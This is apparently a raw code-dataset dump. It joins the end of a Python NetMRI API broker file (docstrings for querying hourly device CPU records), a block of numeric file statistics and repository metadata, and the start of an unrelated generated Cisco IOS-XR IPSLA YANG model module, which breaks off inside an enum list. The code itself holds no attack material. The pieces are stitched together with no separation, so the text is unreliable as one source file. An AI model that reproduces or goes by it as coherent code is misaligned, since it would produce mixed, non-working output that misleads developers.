:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_cpu_hourlies: An array of the DeviceCpuHourly objects that match the specified input criteria.
:rtype device_cpu_hourlies: Array of DeviceCpuHourly
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""Lists the available device cpu hourlies matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: CpuBusyAvg, CpuBusyMax, CpuBusyMin, CpuIndex, DataSourceID, DeviceCpuHourlyID, DeviceID, StartTime.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_CpuBusyAvg: The operator to apply to the field CpuBusyAvg. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. CpuBusyAvg: The mean CPU busy reading during the hour. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_CpuBusyAvg: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_CpuBusyAvg: If op_CpuBusyAvg is specified, the field named in this input will be compared to the value in CpuBusyAvg using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_CpuBusyAvg must be specified if op_CpuBusyAvg is specified.
:type val_f_CpuBusyAvg: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_CpuBusyAvg: If op_CpuBusyAvg is specified, this value will be compared to the value in CpuBusyAvg using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_CpuBusyAvg must be specified if op_CpuBusyAvg is specified.
:type val_c_CpuBusyAvg: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_CpuBusyMax: The operator to apply to the field CpuBusyMax. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. CpuBusyMax: The maximum CPU busy reading during the hour. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_CpuBusyMax: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_CpuBusyMax: If op_CpuBusyMax is specified, the field named in this input will be compared to the value in CpuBusyMax using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_CpuBusyMax must be specified if op_CpuBusyMax is specified.
:type val_f_CpuBusyMax: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_CpuBusyMax: If op_CpuBusyMax is specified, this value will be compared to the value in CpuBusyMax using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_CpuBusyMax must be specified if op_CpuBusyMax is specified.
:type val_c_CpuBusyMax: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_CpuBusyMin: The operator to apply to the field CpuBusyMin. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. CpuBusyMin: The minimum CPU busy reading during the hour. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_CpuBusyMin: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_CpuBusyMin: If op_CpuBusyMin is specified, the field named in this input will be compared to the value in CpuBusyMin using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_CpuBusyMin must be specified if op_CpuBusyMin is specified.
:type val_f_CpuBusyMin: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_CpuBusyMin: If op_CpuBusyMin is specified, this value will be compared to the value in CpuBusyMin using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_CpuBusyMin must be specified if op_CpuBusyMin is specified.
:type val_c_CpuBusyMin: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_CpuIndex: The operator to apply to the field CpuIndex. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. CpuIndex: The CPU number. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_CpuIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_CpuIndex: If op_CpuIndex is specified, the field named in this input will be compared to the value in CpuIndex using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_CpuIndex must be specified if op_CpuIndex is specified.
:type val_f_CpuIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_CpuIndex: If op_CpuIndex is specified, this value will be compared to the value in CpuIndex using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_CpuIndex must be specified if op_CpuIndex is specified.
:type val_c_CpuIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
:type val_f_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
:type val_c_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceCpuHourlyID: The operator to apply to the field DeviceCpuHourlyID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceCpuHourlyID: The internal NetMRI identifier for this Device CPU Hourly record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceCpuHourlyID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceCpuHourlyID: If op_DeviceCpuHourlyID is specified, the field named in this input will be compared to the value in DeviceCpuHourlyID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceCpuHourlyID must be specified if op_DeviceCpuHourlyID is specified.
:type val_f_DeviceCpuHourlyID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceCpuHourlyID: If op_DeviceCpuHourlyID is specified, this value will be compared to the value in DeviceCpuHourlyID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceCpuHourlyID must be specified if op_DeviceCpuHourlyID is specified.
:type val_c_DeviceCpuHourlyID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceID: The operator to apply to the field DeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceID: The internal NetMRI identifier for the device from which this record was collected. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceID: If op_DeviceID is specified, the field named in this input will be compared to the value in DeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceID must be specified if op_DeviceID is specified.
:type val_f_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceID: If op_DeviceID is specified, this value will be compared to the value in DeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceID must be specified if op_DeviceID is specified.
:type val_c_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StartTime: The operator to apply to the field StartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StartTime: The starting date/time for the hourly interval. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StartTime: If op_StartTime is specified, the field named in this input will be compared to the value in StartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StartTime must be specified if op_StartTime is specified.
:type val_f_StartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StartTime: If op_StartTime is specified, this value will be compared to the value in StartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StartTime must be specified if op_StartTime is specified.
:type val_c_StartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` today
:param starttime: The data returned will represent the device cpu hourlies with this date and time as lower boundary. If omitted, the result will indicate the most recently collected data.
:type starttime: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` tomorrow
:param endtime: The data returned will represent the device cpu hourlies with this date and time as upper boundary. If omitted, the result will indicate the most recently collected data.
:type endtime: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device cpu hourly methods. The listed methods will be called on each device cpu hourly returned and included in the output. Available methods are: data_source, device, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceCpuHourlyID
:param sort: The data field(s) to use for sorting the output. Default is DeviceCpuHourlyID. Valid values are DeviceCpuHourlyID, DataSourceID, DeviceID, StartTime, CpuIndex, CpuBusyMin, CpuBusyAvg, CpuBusyMax.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each DeviceCpuHourly. Valid values are DeviceCpuHourlyID, DataSourceID, DeviceID, StartTime, CpuIndex, CpuBusyMin, CpuBusyAvg, CpuBusyMax. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_cpu_hourlies: An array of the DeviceCpuHourly objects that match the specified input criteria.
:rtype device_cpu_hourlies: Array of DeviceCpuHourly
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def data_source(self, **kwargs):
"""The collector NetMRI that collected this data record.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceCpuHourlyID: The internal NetMRI identifier for this Device CPU Hourly record.
:type DeviceCpuHourlyID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The collector NetMRI that collected this data record.
:rtype : DataSource
"""
return self.api_request(self._get_method_fullname("data_source"), kwargs)
def infradevice(self, **kwargs):
"""The device from which this data was collected.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceCpuHourlyID: The internal NetMRI identifier for this Device CPU Hourly record.
:type DeviceCpuHourlyID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device from which this data was collected.
:rtype : InfraDevice
"""
return self.api_request(self._get_method_fullname("infradevice"), kwargs)
def device(self, **kwargs):
"""The device from which this data was collected.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceCpuHourlyID: The internal NetMRI identifier for this Device CPU Hourly record.
:type DeviceCpuHourlyID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device from which this data was collected.
:rtype : Device
"""
return self.api_request(self._get_method_fullname("device"), kwargs)
| 47.952649
| 516
| 0.592091
| 5,082
| 42,534
| 4.911846
| 0.05608
| 0.078519
| 0.051038
| 0.05925
| 0.935061
| 0.93402
| 0.917995
| 0.909022
| 0.890474
| 0.886267
| 0
| 0.005033
| 0.322683
| 42,534
| 887
| 517
| 47.952649
| 0.861432
| 0.799008
| 0
| 0
| 0
| 0
| 0.055369
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.411765
| false
| 0
| 0.058824
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
46937815ee612ffd8864f5e11e9191ed03474849
| 875,834
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_man_ipsla_oper.py
|
bopopescu/ACI
|
dd717bc74739eeed4747b3ea9e36b239580df5e1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_man_ipsla_oper.py
|
bopopescu/ACI
|
dd717bc74739eeed4747b3ea9e36b239580df5e1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_man_ipsla_oper.py
|
bopopescu/ACI
|
dd717bc74739eeed4747b3ea9e36b239580df5e1
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2020-07-22T04:04:44.000Z
|
2020-07-22T04:04:44.000Z
|
""" Cisco_IOS_XR_man_ipsla_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR man\-ipsla package operational data.
This module contains definitions
for the following management objects\:
ipsla\: IPSLA operational data
Copyright (c) 2013\-2017 by Cisco Systems, Inc.
All rights reserved.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class IpslaLspGrpPathStatusEnum(Enum):
"""
IpslaLspGrpPathStatusEnum (Enum Class)
Ipsla lsp grp path status enum
.. data:: ipsla_lsp_grp_path_status_unknown = 0
ipsla lsp grp path status unknown
.. data:: ipsla_lsp_grp_path_status_up = 1
ipsla lsp grp path status up
.. data:: ipsla_lsp_grp_path_status_down = 2
ipsla lsp grp path status down
.. data:: ipsla_lsp_grp_path_status_retry = 3
ipsla lsp grp path status retry
.. data:: ipsla_lsp_grp_path_status_pending = 4
ipsla lsp grp path status pending
"""
ipsla_lsp_grp_path_status_unknown = Enum.YLeaf(0, "ipsla-lsp-grp-path-status-unknown")
ipsla_lsp_grp_path_status_up = Enum.YLeaf(1, "ipsla-lsp-grp-path-status-up")
ipsla_lsp_grp_path_status_down = Enum.YLeaf(2, "ipsla-lsp-grp-path-status-down")
ipsla_lsp_grp_path_status_retry = Enum.YLeaf(3, "ipsla-lsp-grp-path-status-retry")
ipsla_lsp_grp_path_status_pending = Enum.YLeaf(4, "ipsla-lsp-grp-path-status-pending")
class IpslaLspGrpStatusEnum(Enum):
"""
IpslaLspGrpStatusEnum (Enum Class)
Ipsla lsp grp status enum
.. data:: ipsla_lsp_grp_status_unknown = 1
ipsla lsp grp status unknown
.. data:: ipsla_lsp_grp_status_up = 2
ipsla lsp grp status up
.. data:: ipsla_lsp_grp_status_partial = 3
ipsla lsp grp status partial
.. data:: ipsla_lsp_grp_status_down = 4
ipsla lsp grp status down
.. data:: ipsla_lsp_grp_status_pending = 5
ipsla lsp grp status pending
"""
ipsla_lsp_grp_status_unknown = Enum.YLeaf(1, "ipsla-lsp-grp-status-unknown")
ipsla_lsp_grp_status_up = Enum.YLeaf(2, "ipsla-lsp-grp-status-up")
ipsla_lsp_grp_status_partial = Enum.YLeaf(3, "ipsla-lsp-grp-status-partial")
ipsla_lsp_grp_status_down = Enum.YLeaf(4, "ipsla-lsp-grp-status-down")
ipsla_lsp_grp_status_pending = Enum.YLeaf(5, "ipsla-lsp-grp-status-pending")
class IpslaMplsAddDeleteEnum(Enum):
"""
IpslaMplsAddDeleteEnum (Enum Class)
Ipsla mpls add delete enum
.. data:: ipsla_mpls_add_delete_add_q = 1
ipsla mpls add delete add q
.. data:: ipsla_mpls_add_delete_delete_q = 2
ipsla mpls add delete delete q
"""
ipsla_mpls_add_delete_add_q = Enum.YLeaf(1, "ipsla-mpls-add-delete-add-q")
ipsla_mpls_add_delete_delete_q = Enum.YLeaf(2, "ipsla-mpls-add-delete-delete-q")
class IpslaMplsLpdDiscoveryModeEnum(Enum):
"""
IpslaMplsLpdDiscoveryModeEnum (Enum Class)
Ipsla mpls lpd discovery mode enum
.. data:: ipsla_mpls_lpd_unknown = 0
ipsla mpls lpd unknown
.. data:: ipsla_mpls_lpd_initial_running = 1
ipsla mpls lpd initial running
.. data:: ipsla_mpls_lpd_initial_complete = 2
ipsla mpls lpd initial complete
.. data:: ipsla_mpls_lpd_rediscovery_running = 3
ipsla mpls lpd rediscovery running
.. data:: ipsla_mpls_lpd_rediscovery_complete = 4
ipsla mpls lpd rediscovery complete
"""
ipsla_mpls_lpd_unknown = Enum.YLeaf(0, "ipsla-mpls-lpd-unknown")
ipsla_mpls_lpd_initial_running = Enum.YLeaf(1, "ipsla-mpls-lpd-initial-running")
ipsla_mpls_lpd_initial_complete = Enum.YLeaf(2, "ipsla-mpls-lpd-initial-complete")
ipsla_mpls_lpd_rediscovery_running = Enum.YLeaf(3, "ipsla-mpls-lpd-rediscovery-running")
ipsla_mpls_lpd_rediscovery_complete = Enum.YLeaf(4, "ipsla-mpls-lpd-rediscovery-complete")
class IpslaMplsLpdPathDiscoveryStatus(Enum):
"""
IpslaMplsLpdPathDiscoveryStatus (Enum Class)
Ipsla mpls lpd path discovery status
.. data:: ipsla_mpls_lpd_path_discovery_unknown = 0
ipsla mpls lpd path discovery unknown
.. data:: ipsla_mpls_lpd_path_discovery_ok = 1
ipsla mpls lpd path discovery ok
.. data:: ipsla_mpls_lpd_path_discovery_broken = 2
ipsla mpls lpd path discovery broken
.. data:: ipsla_mpls_lpd_path_discovery_unexplorable = 3
ipsla mpls lpd path discovery unexplorable
"""
ipsla_mpls_lpd_path_discovery_unknown = Enum.YLeaf(0, "ipsla-mpls-lpd-path-discovery-unknown")
ipsla_mpls_lpd_path_discovery_ok = Enum.YLeaf(1, "ipsla-mpls-lpd-path-discovery-ok")
ipsla_mpls_lpd_path_discovery_broken = Enum.YLeaf(2, "ipsla-mpls-lpd-path-discovery-broken")
ipsla_mpls_lpd_path_discovery_unexplorable = Enum.YLeaf(3, "ipsla-mpls-lpd-path-discovery-unexplorable")
class IpslaMplsLpdRetCode(Enum):
"""
IpslaMplsLpdRetCode (Enum Class)
Ipsla mpls lpd ret code
.. data:: ipsla_mpls_lpd_ret_code_unknown = 1
ipsla mpls lpd ret code unknown
.. data:: ipsla_mpls_lpd_ret_code_no_path = 2
ipsla mpls lpd ret code no path
.. data:: ipsla_mpls_lpd_ret_code_all_path_broken = 3
ipsla mpls lpd ret code all path broken
.. data:: ipsla_mpls_lpd_ret_code_all_path_unexplorable = 4
ipsla mpls lpd ret code all path unexplorable
.. data:: ipsla_mpls_lpd_ret_code_all_path_broken_or_unexplorable = 5
ipsla mpls lpd ret code all path broken or
unexplorable
.. data:: ipsla_mpls_lpd_ret_code_timeout = 6
ipsla mpls lpd ret code timeout
.. data:: ipsla_mpls_lpd_ret_code_error = 7
ipsla mpls lpd ret code error
.. data:: ipsla_mpls_lpd_ret_code_ok = 8
ipsla mpls lpd ret code ok
"""
ipsla_mpls_lpd_ret_code_unknown = Enum.YLeaf(1, "ipsla-mpls-lpd-ret-code-unknown")
ipsla_mpls_lpd_ret_code_no_path = Enum.YLeaf(2, "ipsla-mpls-lpd-ret-code-no-path")
ipsla_mpls_lpd_ret_code_all_path_broken = Enum.YLeaf(3, "ipsla-mpls-lpd-ret-code-all-path-broken")
ipsla_mpls_lpd_ret_code_all_path_unexplorable = Enum.YLeaf(4, "ipsla-mpls-lpd-ret-code-all-path-unexplorable")
ipsla_mpls_lpd_ret_code_all_path_broken_or_unexplorable = Enum.YLeaf(5, "ipsla-mpls-lpd-ret-code-all-path-broken-or-unexplorable")
ipsla_mpls_lpd_ret_code_timeout = Enum.YLeaf(6, "ipsla-mpls-lpd-ret-code-timeout")
ipsla_mpls_lpd_ret_code_error = Enum.YLeaf(7, "ipsla-mpls-lpd-ret-code-error")
ipsla_mpls_lpd_ret_code_ok = Enum.YLeaf(8, "ipsla-mpls-lpd-ret-code-ok")
class IpslaOperStateEnum(Enum):
"""
IpslaOperStateEnum (Enum Class)
Ipsla oper state enum
.. data:: ipsla_oper_state_inactive = 0
ipsla oper state inactive
.. data:: ipsla_oper_state_pending = 1
ipsla oper state pending
.. data:: ipsla_oper_state_active = 2
ipsla oper state active
"""
ipsla_oper_state_inactive = Enum.YLeaf(0, "ipsla-oper-state-inactive")
ipsla_oper_state_pending = Enum.YLeaf(1, "ipsla-oper-state-pending")
ipsla_oper_state_active = Enum.YLeaf(2, "ipsla-oper-state-active")
class IpslaRetCode(Enum):
"""
IpslaRetCode (Enum Class)
Ipsla ret code
.. data:: ipsla_ret_code_unknown = 0
ipsla ret code unknown
.. data:: ipsla_ret_code_ok = 1
ipsla ret code ok
.. data:: ipsla_ret_code_disconnect = 2
ipsla ret code disconnect
.. data:: ipsla_ret_code_over_threshold = 3
ipsla ret code over threshold
.. data:: ipsla_ret_code_timeout = 4
ipsla ret code timeout
.. data:: ipsla_ret_code_busy = 5
ipsla ret code busy
.. data:: ipsla_ret_code_no_connection = 6
ipsla ret code no connection
.. data:: ipsla_ret_code_dropped = 7
ipsla ret code dropped
.. data:: ipsla_ret_code_sequence_error = 8
ipsla ret code sequence error
.. data:: ipsla_ret_code_verify_error = 9
ipsla ret code verify error
.. data:: ipsla_ret_code_application_specific = 10
ipsla ret code application specific
.. data:: ipsla_ret_code_dns_server_timeout = 11
ipsla ret code dns server timeout
.. data:: ipsla_ret_code_tcp_connect_timeout = 12
ipsla ret code tcp connect timeout
.. data:: ipsla_ret_code_http_transaction_timeout = 13
ipsla ret code http transaction timeout
.. data:: ipsla_ret_code_dns_query_error = 14
ipsla ret code dns query error
.. data:: ipsla_ret_code_http_error = 15
ipsla ret code http error
.. data:: ipsla_ret_code_internal_error = 16
ipsla ret code internal error
.. data:: ipsla_ret_code_mpls_lsp_echo_tx_error = 17
ipsla ret code mpls lsp echo tx error
.. data:: ipsla_ret_code_mpls_lsp_unreachable = 18
ipsla ret code mpls lsp unreachable
.. data:: ipsla_ret_code_mpls_lsp_malformed_request = 19
ipsla ret code mpls lsp malformed request
.. data:: ipsla_ret_code_mpls_lsp_reachable_but_not_fec = 20
ipsla ret code mpls lsp reachable but not fec
.. data:: ipsla_ret_code_mpls_lsp_ds_map_mismatch = 21
ipsla ret code mpls lsp ds map mismatch
.. data:: ipsla_ret_code_mpls_lsp_duplicate = 22
ipsla ret code mpls lsp duplicate
.. data:: ipsla_ret_code_failure = 23
ipsla ret code failure
.. data:: ipsla_ret_code_malloc_failure = 24
ipsla ret code malloc failure
.. data:: ipsla_ret_code_sock_open_error = 25
ipsla ret code sock open error
.. data:: ipsla_ret_code_sock_bind_error = 26
ipsla ret code sock bind error
.. data:: ipsla_ret_code_sock_send_error = 27
ipsla ret code sock send error
.. data:: ipsla_ret_code_sock_recv_error = 28
ipsla ret code sock recv error
.. data:: ipsla_ret_code_sock_connect_error = 29
ipsla ret code sock connect error
.. data:: ipsla_ret_code_sock_set_option_error = 30
ipsla ret code sock set option error
.. data:: ipsla_ret_code_sock_attach_error = 31
ipsla ret code sock attach error
.. data:: ipsla_ret_code_ctrl_msg_error = 32
ipsla ret code ctrl msg error
.. data:: ipsla_ret_code_no_key_chain = 33
ipsla ret code no key chain
.. data:: ipsla_ret_code_key_chain_lib_fail = 34
ipsla ret code key chain lib fail
.. data:: ipsla_ret_code_no_key_id = 35
ipsla ret code no key id
.. data:: ipsla_ret_code_invalid_key_id = 36
ipsla ret code invalid key id
.. data:: ipsla_ret_code_entry_exist = 37
ipsla ret code entry exist
.. data:: ipsla_ret_code_entry_not_found = 38
ipsla ret code entry not found
.. data:: ipsla_ret_code_hop_over_max = 39
ipsla ret code hop over max
.. data:: ipsla_ret_code_hop_dup_address = 40
ipsla ret code hop dup address
.. data:: ipsla_ret_code_vrf_name_error = 41
ipsla ret code vrf name error
.. data:: ipsla_ret_code_resp_failure = 42
ipsla ret code resp failure
.. data:: ipsla_ret_code_auth_failure = 43
ipsla ret code auth failure
.. data:: ipsla_ret_code_format_failure = 44
ipsla ret code format failure
.. data:: ipsla_ret_code_port_in_use = 45
ipsla ret code port in use
.. data:: ipsla_ret_code_no_route = 46
ipsla ret code no route
.. data:: ipsla_ret_code_pending = 47
ipsla ret code pending
.. data:: ipsla_ret_code_invalid_address = 48
ipsla ret code invalid address
.. data:: ipsla_ret_code_max = 49
ipsla ret code max
"""
ipsla_ret_code_unknown = Enum.YLeaf(0, "ipsla-ret-code-unknown")
ipsla_ret_code_ok = Enum.YLeaf(1, "ipsla-ret-code-ok")
ipsla_ret_code_disconnect = Enum.YLeaf(2, "ipsla-ret-code-disconnect")
ipsla_ret_code_over_threshold = Enum.YLeaf(3, "ipsla-ret-code-over-threshold")
ipsla_ret_code_timeout = Enum.YLeaf(4, "ipsla-ret-code-timeout")
ipsla_ret_code_busy = Enum.YLeaf(5, "ipsla-ret-code-busy")
ipsla_ret_code_no_connection = Enum.YLeaf(6, "ipsla-ret-code-no-connection")
ipsla_ret_code_dropped = Enum.YLeaf(7, "ipsla-ret-code-dropped")
ipsla_ret_code_sequence_error = Enum.YLeaf(8, "ipsla-ret-code-sequence-error")
ipsla_ret_code_verify_error = Enum.YLeaf(9, "ipsla-ret-code-verify-error")
ipsla_ret_code_application_specific = Enum.YLeaf(10, "ipsla-ret-code-application-specific")
ipsla_ret_code_dns_server_timeout = Enum.YLeaf(11, "ipsla-ret-code-dns-server-timeout")
ipsla_ret_code_tcp_connect_timeout = Enum.YLeaf(12, "ipsla-ret-code-tcp-connect-timeout")
ipsla_ret_code_http_transaction_timeout = Enum.YLeaf(13, "ipsla-ret-code-http-transaction-timeout")
ipsla_ret_code_dns_query_error = Enum.YLeaf(14, "ipsla-ret-code-dns-query-error")
ipsla_ret_code_http_error = Enum.YLeaf(15, "ipsla-ret-code-http-error")
ipsla_ret_code_internal_error = Enum.YLeaf(16, "ipsla-ret-code-internal-error")
ipsla_ret_code_mpls_lsp_echo_tx_error = Enum.YLeaf(17, "ipsla-ret-code-mpls-lsp-echo-tx-error")
ipsla_ret_code_mpls_lsp_unreachable = Enum.YLeaf(18, "ipsla-ret-code-mpls-lsp-unreachable")
ipsla_ret_code_mpls_lsp_malformed_request = Enum.YLeaf(19, "ipsla-ret-code-mpls-lsp-malformed-request")
ipsla_ret_code_mpls_lsp_reachable_but_not_fec = Enum.YLeaf(20, "ipsla-ret-code-mpls-lsp-reachable-but-not-fec")
ipsla_ret_code_mpls_lsp_ds_map_mismatch = Enum.YLeaf(21, "ipsla-ret-code-mpls-lsp-ds-map-mismatch")
ipsla_ret_code_mpls_lsp_duplicate = Enum.YLeaf(22, "ipsla-ret-code-mpls-lsp-duplicate")
ipsla_ret_code_failure = Enum.YLeaf(23, "ipsla-ret-code-failure")
ipsla_ret_code_malloc_failure = Enum.YLeaf(24, "ipsla-ret-code-malloc-failure")
